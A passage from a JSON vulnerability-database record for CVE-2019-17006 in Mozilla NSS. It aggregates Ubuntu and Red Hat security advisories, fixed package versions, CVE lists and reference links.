19.10:\n  libnss3                         2:3.45-1ubuntu2.2\n\nUbuntu 19.04:\n  libnss3                         2:3.42-1ubuntu2.5\n\nUbuntu 18.04 LTS:\n  libnss3                         2:3.35-2ubuntu2.7\n\nUbuntu 16.04 LTS:\n  libnss3                         2:3.28.4-0ubuntu0.16.04.10\n\nUbuntu 14.04 ESM:\n  libnss3                         2:3.28.4-0ubuntu0.14.04.5+esm4\n\nUbuntu 12.04 ESM:\n  libnss3                         2:3.28.4-0ubuntu0.12.04.7\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. 7.4) - x86_64\n\n3. 7.7) - ppc64, ppc64le, s390x, x86_64\n\n3. Summary:\n\nRed Hat Ansible Automation Platform Resource Operator 1.2 (technical\npreview) images that fix several security issues. Description:\n\nRed Hat Ansible Automation Platform Resource Operator container images\nwith security fixes. \n\nAnsible Automation Platform manages Ansible Platform jobs and workflows\nthat can interface with any infrastructure on a Red Hat OpenShift Container\nPlatform cluster, or on a traditional infrastructure that is running\noff-cluster. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n1914774 - CVE-2021-20178 ansible: user data leak in snmp_facts module\n1915808 - CVE-2021-20180 ansible module: bitbucket_pipeline_variable exposes secured values\n1916813 - CVE-2021-20191 ansible: multiple modules expose secured values\n1925002 - CVE-2021-20228 ansible: basic.py no_log with fallback option\n1939349 - CVE-2021-3447 ansible: multiple modules expose secured values\n\n5. Description:\n\n* Updated python-psutil version to 5.6.6 inside ansible-runner container\n(CVE-2019-18874)\n\n3. Solution:\n\nFor information on upgrading Ansible Tower, reference the Ansible Tower\nUpgrade and Migration Guide:\nhttps://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/\nindex.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1772014 - CVE-2019-18874 python-psutil: double free because of refcount mishandling\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Moderate: nss and nss-softokn security update\nAdvisory ID:       RHSA-2021:0876-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:0876\nIssue date:        2021-03-16\nCVE Names:         CVE-2019-11756 CVE-2019-17006 CVE-2019-17007\n                   CVE-2020-12403\n====================================================================\n1. Summary:\n\nAn update for nss and nss-softokn is now available for Red Hat Enterprise\nLinux 7.6 Extended Update Support. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux ComputeNode EUS (v. 7.6) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional EUS (v. 7.6) - x86_64\nRed Hat Enterprise Linux Server EUS (v. 7.6) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional EUS (v. 7.6) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, ppc64le, s390x\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, ppc64le, s390x\n\n3. Description:\n\nNetwork Security Services (NSS) is a set of libraries designed to support\nthe cross-platform development of security-enabled client and server\napplications. \n\nSecurity Fix(es):\n\n* nss: Use-after-free in sftk_FreeSession due to improper refcounting\n(CVE-2019-11756)\n\n* nss: Check length of inputs for cryptographic primitives (CVE-2019-17006)\n\n* nss: Handling of Netscape Certificate Sequences in\nCERT_DecodeCertPackage() may crash with a NULL deref leading to DoS\n(CVE-2019-17007)\n\n* nss: CHACHA20-POLY1305 decryption with undersized tag leads to\nout-of-bounds read (CVE-2020-12403)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nAfter installing this update, applications using NSS (for example, Firefox)\nmust be restarted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1703979 - CVE-2019-17007 nss: Handling of Netscape Certificate Sequences in CERT_DecodeCertPackage() may crash with a NULL deref leading to DoS\n1774835 - CVE-2019-11756 nss: Use-after-free in sftk_FreeSession due to improper refcounting\n1775916 - CVE-2019-17006 nss: Check length of inputs for cryptographic primitives\n1868931 - CVE-2020-12403 nss: CHACHA20-POLY1305 decryption with undersized tag leads to out-of-bounds read\n\n6. Package List:\n\nRed Hat Enterprise Linux ComputeNode EUS (v. 7.6):\n\nSource:\nnss-3.36.0-9.el7_6.src.rpm\nnss-softokn-3.36.0-7.el7_6.src.rpm\n\nx86_64:\nnss-3.36.0-9.el7_6.i686.rpm\nnss-3.36.0-9.el7_6.x86_64.rpm\nnss-debuginfo-3.36.0-9.el7_6.i686.rpm\nnss-debuginfo-3.36.0-9.el7_6.x86_64.rpm\nnss-softokn-3.36.0-7.el7_6.i686.rpm\nnss-softokn-3.36.0-7.el7_6.x86_64.rpm\nnss-softokn-debuginfo-3.36.0-7.el7_6.i686.rpm\nnss-softokn-debuginfo-3.36.0-7.el7_6.x86_64.rpm\nnss-softokn-freebl-3.36.0-7.el7_6.i686.rpm\nnss-softokn-freebl-3.36.0-7.el7_6.x86_64.rpm\nnss-sysinit-3.36.0-9.el7_6.x86_64.rpm\nnss-tools-3.36.0-9.el7_6.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional EUS (v. 7.6):\n\nx86_64:\nnss-debuginfo-3.36.0-9.el7_6.i686.rpm\nnss-debuginfo-3.36.0-9.el7_6.x86_64.rpm\nnss-devel-3.36.0-9.el7_6.i686.rpm\nnss-devel-3.36.0-9.el7_6.x86_64.rpm\nnss-pkcs11-devel-3.36.0-9.el7_6.i686.rpm\nnss-pkcs11-devel-3.36.0-9.el7_6.x86_64.rpm\nnss-softokn-debuginfo-3.36.0-7.el7_6.i686.rpm\nnss-softokn-debuginfo-3.36.0-7.el7_6.x86_64.rpm\nnss-softokn-devel-3.36.0-7.el7_6.i686.rpm\nnss-softokn-devel-3.36.0-7.el7_6.x86_64.rpm\nnss-softokn-freebl-devel-3.36.0-7.el7_6.i686.rpm\nnss-softokn-freebl-devel-3.36.0-7.el7_6.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 7.6):\n\nSource:\nnss-3.36.0-9.el7_6.src.rpm\nnss-softokn-3.36.0-7.el7_6.src.rpm\n\nppc64:\nnss-3.36.0-9.el7_6.ppc.rpm\nnss-3.36.0-9.el7_6.ppc64.rpm\nnss-debuginfo-3.36.0-9.el7_6.ppc.rpm\nnss-debuginfo-3.36.0-9.el7_6.ppc64.rpm\nnss-devel-3.36.0-9.el7_6.ppc.rpm\nnss-devel-3.36.0-9.el7_6.ppc64.rpm\nnss-softokn-3.36.0-7.el7_6.ppc.rpm\nnss-softokn-3.36.0-7.el7_6.ppc64.rpm\nnss-softokn-debuginfo-3.36.0-7.el7_6.ppc.rpm\nnss-softokn-debuginfo-3.36.0-7.el7_6.ppc64.rpm\nnss-softokn-devel-3.36.0-7.el7_6.ppc.rpm\nnss-softokn-devel-3.36.0-7.el7_6.ppc64.rpm\nnss-softokn-freebl-3.36.0-7.el7_6.ppc.rpm\nnss-softokn-freebl-3.36.0-7.el7_6.ppc64.rpm\nnss-softokn-freebl-devel-3.36.0-7.el7_6.ppc.rpm\nnss-softokn-freebl-devel-3.36.0-7.el7_6.ppc64.rpm\nnss-sysinit-3.36.0-9.el7_6.ppc64.rpm\nnss-tools-3.36.0-9.el7_6.ppc64.rpm\n\nppc64le:\nnss-3.36.0-9.el7_6.ppc64le.rpm\nnss-debuginfo-3.36.0-9.el7_6.ppc64le.rpm\nnss-devel-3.36.0-9.el7_6.ppc64le.rpm\nnss-softokn-3.36.0-7.el7_6.ppc64le.rpm\nnss-softokn-debuginfo-3.36.0-7.el7_6.ppc64le.rpm\nnss-softokn-devel-3.36.0-7.el7_6.ppc64le.rpm\nnss-softokn-freebl-3.36.0-7.el7_6.ppc64le.rpm\nnss-softokn-freebl-devel-3.36.0-7.el7_6.ppc64le.rpm\nnss-sysinit-3.36.0-9.el7_6.ppc64le.rpm\nnss-tools-3.36.0-9.el7_6.ppc64le.rpm\n\ns390x:\nnss-3.36.0-9.el7_6.s390.rpm\nnss-3.36.0-9.el7_6.s390x.rpm\nnss-debuginfo-3.36.0-9.el7_6.s390.rpm\nnss-debuginfo-3.36.0-9.el7_6.s390x.rpm\nnss-devel-3.36.0-9.el7_6.s390.rpm\nnss-devel-3.36.0-9.el7_6.s390x.rpm\nnss-softokn-3.36.0-7.el7_6.s390.rpm\nnss-softokn-3.36.0-7.el7_6.s390x.rpm\nnss-softokn-debuginfo-3.36.0-7.el7_6.s390.rpm\nnss-softokn-debuginfo-3.36.0-7.el7_6.s390x.rpm\nnss-softokn-devel-3.36.0-7.el7_6.s390.rpm\nnss-softokn-devel-3.36.0-7.el7_6.s390x.rpm\nnss-softokn-freebl-3.36.0-7.el7_6.s390.rpm\nnss-softokn-freebl-3.36.0-7.el7_6.s390x.rpm\nnss-softokn-freebl-devel-3.36.0-7.el7_6.s390.rpm\nnss-softokn-freebl-devel-3.36.0-7.el7_6.s390x.rpm\nnss-sysinit-3.36.0-9.el7_6.s390x.rpm\nnss-tools-3.36.0-9.el7_6.s390x.rpm\n\nx86_64:\nnss-3.36.0-9.el7_6.i686.rpm\nnss-3.36.0-9.el7_6.x86_64.rpm\nnss-debuginfo-3.36.0-9.el7_6.i686.rpm\nnss-debuginfo-3.36.0-9.el7_6.x86_64.rpm\nnss-devel-3.36.0-9.el7_6.i686.rpm\nnss-devel-3.36.0-9.el7_6.x86_64.rpm\nnss-softokn-3.36.0-7.el7_6.i686.rpm\nnss-softokn-3.36.0-7.el7_6.x86_64.rpm\nnss-softokn-debuginfo-3.36.0-7.el7_6.i686.rpm\nnss-softokn-debuginfo-3.36.0-7.el7_6.x86_64.rpm\nnss-softokn-devel-3.36.0-7.el7_6.i686.rpm\nnss-softokn-devel-3.36.0-7.el7_6.x86_64.rpm\nnss-softokn-freebl-3.36.0-7.el7_6.i686.rpm\nnss-softokn-freebl-3.36.0-7.el7_6.x86_64.rpm\nnss-softokn-freebl-devel-3.36.0-7.el7_6.i686.rpm\nnss-softokn-freebl-devel-3.36.0-7.el7_6.x86_64.rpm\nnss-sysinit-3.36.0-9.el7_6.x86_64.rpm\nnss-tools-3.36.0-9.el7_6.x86_64.rpm\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):\n\nSource:\nnss-3.36.0-9.el7_6.src.rpm\nnss-softokn-3.36.0-7.el7_6.src.rpm\n\naarch64:\nnss-3.36.0-9.el7_6.aarch64.rpm\nnss-debuginfo-3.36.0-9.el7_6.aarch64.rpm\nnss-devel-3.36.0-9.el7_6.aarch64.rpm\nnss-softokn-3.36.0-7.el7_6.aarch64.rpm\nnss-softokn-debuginfo-3.36.0-7.el7_6.aarch64.rpm\nnss-softokn-devel-3.36.0-7.el7_6.aarch64.rpm\nnss-softokn-freebl-3.36.0-7.el7_6.aarch64.rpm\nnss-softokn-freebl-devel-3.36.0-7.el7_6.aarch64.rpm\nnss-sysinit-3.36.0-9.el7_6.aarch64.rpm\nnss-tools-3.36.0-9.el7_6.aarch64.rpm\n\nppc64le:\nnss-3.36.0-9.el7_6.ppc64le.rpm\nnss-debuginfo-3.36.0-9.el7_6.ppc64le.rpm\nnss-devel-3.36.0-9.el7_6.ppc64le.rpm\nnss-softokn-3.36.0-7.el7_6.ppc64le.rpm\nnss-softokn-debuginfo-3.36.0-7.el7_6.ppc64le.rpm\nnss-softokn-devel-3.36.0-7.el7_6.ppc64le.rpm\nnss-softokn-freebl-3.36.0-7.el7_6.ppc64le.rpm\nnss-softokn-freebl-devel-3.36.0-7.el7_6.ppc64le.rpm\nnss-sysinit-3.36.0-9.el7_6.ppc64le.rpm\nnss-tools-3.36.0-9.el7_6.ppc64le.rpm\n\ns390x:\nnss-3.36.0-9.el7_6.s390.rpm\nnss-3.36.0-9.el7_6.s390x.rpm\nnss-debuginfo-3.36.0-9.el7_6.s390.rpm\nnss-debuginfo-3.36.0-9.el7_6.s390x.rpm\nnss-devel-3.36.0-9.el7_6.s390.rpm\nnss-devel-3.36.0-9.el7_6.s390x.rpm\nnss-softokn-3.36.0-7.el7_6.s390.rpm\nnss-softokn-3.36.0-7.el7_6.s390x.rpm\nnss-softokn-debuginfo-3.36.0-7.el7_6.s390.rpm\nnss-softokn-debuginfo-3.36.0-7.el7_6.s390x.rpm\nnss-softokn-devel-3.36.0-7.el7_6.s390.rpm\nnss-softokn-devel-3.36.0-7.el7_6.s390x.rpm\nnss-softokn-freebl-3.36.0-7.el7_6.s390.rpm\nnss-softokn-freebl-3.36.0-7.el7_6.s390x.rpm\nnss-softokn-freebl-devel-3.36.0-7.el7_6.s390.rpm\nnss-softokn-freebl-devel-3.36.0-7.el7_6.s390x.rpm\nnss-sysinit-3.36.0-9.el7_6.s390x.rpm\nnss-tools-3.36.0-9.el7_6.s390x.rpm\n\nRed Hat Enterprise Linux Server Optional EUS (v. 7.6):\n\nppc64:\nnss-debuginfo-3.36.0-9.el7_6.ppc.rpm\nnss-debuginfo-3.36.0-9.el7_6.ppc64.rpm\nnss-pkcs11-devel-3.36.0-9.el7_6.ppc.rpm\nnss-pkcs11-devel-3.36.0-9.el7_6.ppc64.rpm\n\nppc64le:\nnss-debuginfo-3.36.0-9.el7_6.ppc64le.rpm\nnss-pkcs11-devel-3.36.0-9.el7_6.ppc64le.rpm\n\ns390x:\nnss-debuginfo-3.36.0-9.el7_6.s390.rpm\nnss-debuginfo-3.36.0-9.el7_6.s390x.rpm\nnss-pkcs11-devel-3.36.0-9.el7_6.s390.rpm\nnss-pkcs11-devel-3.36.0-9.el7_6.s390x.rpm\n\nx86_64:\nnss-debuginfo-3.36.0-9.el7_6.i686.rpm\nnss-debuginfo-3.36.0-9.el7_6.x86_64.rpm\nnss-pkcs11-devel-3.36.0-9.el7_6.i686.rpm\nnss-pkcs11-devel-3.36.0-9.el7_6.x86_64.rpm\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):\n\naarch64:\nnss-debuginfo-3.36.0-9.el7_6.aarch64.rpm\nnss-pkcs11-devel-3.36.0-9.el7_6.aarch64.rpm\n\nppc64le:\nnss-debuginfo-3.36.0-9.el7_6.ppc64le.rpm\nnss-pkcs11-devel-3.36.0-9.el7_6.ppc64le.rpm\n\ns390x:\nnss-debuginfo-3.36.0-9.el7_6.s390.rpm\nnss-debuginfo-3.36.0-9.el7_6.s390x.rpm\nnss-pkcs11-devel-3.36.0-9.el7_6.s390.rpm\nnss-pkcs11-devel-3.36.0-9.el7_6.s390x.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-11756\nhttps://access.redhat.com/security/cve/CVE-2019-17006\nhttps://access.redhat.com/security/cve/CVE-2019-17007\nhttps://access.redhat.com/security/cve/CVE-2020-12403\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYFDHndzjgjWX9erEAQhc7BAAkp67Ydt2JQVRfRhv2NUd0sjnWReLTvdP\njCz5vIgKz8JIgmz/bc5I1MR8ZCSObdbsUEiv0exapuYneLNru//0dMGL2dv7Fkn5\nEm5+ZuvLuDUq9id8TOOd5igNjBeJGKy4dJV46AXtgUHARHbiU5jcmOcCetkBY09J\no0bK4wDc6YjvUBANaAQH/sWznAT+BNmtOeF00seAbIgic0m76HidFSQzcq8I+vtm\nmttqgZvz3+xYitS/63Z4AQofI3VFGX46CHZxekI7N1hIpML7QjiZw4gk8QgdpRWn\nwLtr661MIse/iS0l+4ZvQoWx5diuVwXudfGmisEXhsWtx79m8JSFNavmxSK9dvJ5\n5F6K275OTX2W1GSUgU4IrKxWaLoBPQlC4yT36c4827qosGBjgufGyExgmqnTyQyR\niobqDMUHq5RgjNsHNCzrm7CKAgwTUgyuN5QLoXwOsqxPfMt1uL8TI1Q5ULyuPJ+b\n8IxbIPGgCZM/haNchD9Xoo1rDieT1JOtQNTfknss91AIQZH30n7i6F6/l8K7GJ16\n1sFPnNI7aISjvhu/+jfgNpkoFi6Qyda5a8jSceWpY1yf83/jsxVpKMqgcoTf416z\nIFzoYxQqa0AM1efVfgtL1vnoAXw8yPt0PjXfcMUYWltIGbgO15L/hJZ6bCUu8FT6\nBbaFUBBSJpw=m1vv\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. \n\nNetscape Portable Runtime (NSPR) provides platform independence for non-GUI\noperating system facilities. \n\nThe following packages have been upgraded to a later upstream version: nss\n(3.53.1), nspr (4.25.0). \n\nBug Fix(es):\n\n* Install of update of nss.x86_64 adds i686 into transaction (BZ#1663187)\n\n* NSS does not set downgrade sentinel in ServerHello.random for TLS 1.0 and\nTLS 1.1 (BZ#1691409)\n\n* TLS Keying Material Exporter is unsupported by command line tools\n(BZ#1691454)\n\n* TLS_AES_256_GCM_SHA384 is not marked as FIPS compatible (BZ#1711375)\n\n* Make TLS 1.3 work in FIPS mode (BZ#1724250)\n\n* NSS rejects records with large padding with SHA384 HMAC (BZ#1750921)\n\n* NSS missing IKEv1 Quick Mode KDF (BZ#1809637)\n\n* Name Constraints validation: CN treated as DNS name even when\nsyntactically invalid as DNS name (BZ#1825270)\n\n* FIPS needs nss to restrict valid dh primes to those primes that are\napproved. (BZ#1854564)\n\n* nss needs to comply to the new SP800-56A rev 3 requirements (BZ#1855825)\n\nEnhancement(s):\n\n* [RFE] nss should use AES for storage of keys (BZ#1723819)\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1663187 - Install of update of nss.x86_64 adds i686 into transaction\n1691454 - TLS Keying Material Exporter is unsupported by command line tools\n1711375 - TLS_AES_256_GCM_SHA384 is not marked as FIPS compatible\n1724250 - Make TLS 1.3 work in FIPS mode [rhel-8]\n1750921 - NSS rejects records with large padding with SHA384 HMAC\n1774835 - CVE-2019-11756 nss: UAF in sftk_FreeSession due to improper refcounting\n1775916 - CVE-2019-17006 nss: Check length of inputs for cryptographic primitives\n1791225 - CVE-2019-17023 nss: TLS 1.3 HelloRetryRequest downgrade request sets client into invalid state\n1809637 - NSS missing IKEv1 Quick Mode KDF\n1825270 - Name Constraints validation: CN treated as DNS name even when syntactically invalid as DNS name\n1826231 - CVE-2020-12402 nss: Side channel vulnerabilities during RSA key generation\n1854564 - FIPS needs nss to restrict valid dh primes to those primes that are approved. [rhel-8.2.0.z]\n\n6",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-17006"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-17006"
      },
      {
        "db": "PACKETSTORM",
        "id": "168879"
      },
      {
        "db": "PACKETSTORM",
        "id": "155889"
      },
      {
        "db": "PACKETSTORM",
        "id": "161706"
      },
      {
        "db": "PACKETSTORM",
        "id": "162026"
      },
      {
        "db": "PACKETSTORM",
        "id": "162142"
      },
      {
        "db": "PACKETSTORM",
        "id": "159553"
      },
      {
        "db": "PACKETSTORM",
        "id": "161842"
      },
      {
        "db": "PACKETSTORM",
        "id": "158724"
      }
    ],
    "trust": 1.71
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-17006",
        "trust": 2.5
      },
      {
        "db": "SIEMENS",
        "id": "SSA-379803",
        "trust": 1.7
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-21-040-04",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "155889",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "161706",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "162026",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "162142",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "159553",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "161842",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "158724",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0491",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.3355",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.3535",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2604",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.2650",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0072",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0933",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.3461",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1193",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0053",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0834",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.2446",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0986",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0136",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0001",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.3631",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1091",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1207",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "162130",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "159396",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "161916",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "159661",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "159497",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021071301",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021043017",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-1134",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-17006",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168879",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-17006"
      },
      {
        "db": "PACKETSTORM",
        "id": "168879"
      },
      {
        "db": "PACKETSTORM",
        "id": "155889"
      },
      {
        "db": "PACKETSTORM",
        "id": "161706"
      },
      {
        "db": "PACKETSTORM",
        "id": "162026"
      },
      {
        "db": "PACKETSTORM",
        "id": "162142"
      },
      {
        "db": "PACKETSTORM",
        "id": "159553"
      },
      {
        "db": "PACKETSTORM",
        "id": "161842"
      },
      {
        "db": "PACKETSTORM",
        "id": "158724"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-1134"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-17006"
      }
    ]
  },
  "id": "VAR-202010-0251",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.52540106
  },
  "last_update_date": "2026-03-09T21:20:18.369000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "Mozilla Network Security Services Buffer error vulnerability fix",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=105845"
      },
      {
        "title": "Ubuntu Security Notice: nss vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-4231-1"
      },
      {
        "title": "Red Hat: Moderate: nss and nspr security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203280 - Security Advisory"
      },
      {
        "title": "IBM: Security Bulletin:  A security vulnerabilitiy has been fixed in IBM Security Identity Manager Virtual Appliance(CVE-2019-17006)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=a91447c5697ecfb6bbab6f4cf67cb949"
      },
      {
        "title": "Red Hat: Moderate: nss and nspr security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204076 - Security Advisory"
      },
      {
        "title": "Debian Security Advisories: DSA-4726-1 nss -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=2610caa3eacc40f97585be7c579718bd"
      },
      {
        "title": "Red Hat: Low: OpenShift Virtualization 2.4.2 Images",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204201 - Security Advisory"
      },
      {
        "title": "IBM: Security Bulletin: IBM Security Privileged Identity Manager is affected by security vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=52844442ae85845bde006e7f0170408e"
      },
      {
        "title": "Red Hat: Moderate: security update - Red Hat Ansible Tower 3.6 runner release (CVE-2019-18874)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204255 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: security update - Red Hat Ansible Tower 3.7 runner release (CVE-2019-18874)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204254 - Security Advisory"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=409c1cd1b8ef401020956950fd839000"
      },
      {
        "title": "Red Hat: Low: OpenShift Container Platform 4.3.40 security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204264 - Security Advisory"
      },
      {
        "title": "zot",
        "trust": 0.1,
        "url": "https://github.com/anuvu/zot "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-17006"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-1134"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-20",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-17006"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 2.3,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-040-04"
      },
      {
        "trust": 1.7,
        "url": "https://developer.mozilla.org/en-us/docs/mozilla/projects/nss/nss_3.46_release_notes"
      },
      {
        "trust": 1.7,
        "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1539788"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20210129-0001/"
      },
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-379803.pdf"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17006"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17006"
      },
      {
        "trust": 0.7,
        "url": "https://usn.ubuntu.com/4231-1/"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2019-11756"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11756"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193395-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.debian.org/lts/security/2020/dla-2058"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2020/suse-su-20200088-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.3535/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/155889/ubuntu-security-notice-usn-4231-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/159396/red-hat-security-advisory-2020-4076-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0072/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0136/"
      },
      {
        "trust": 0.6,
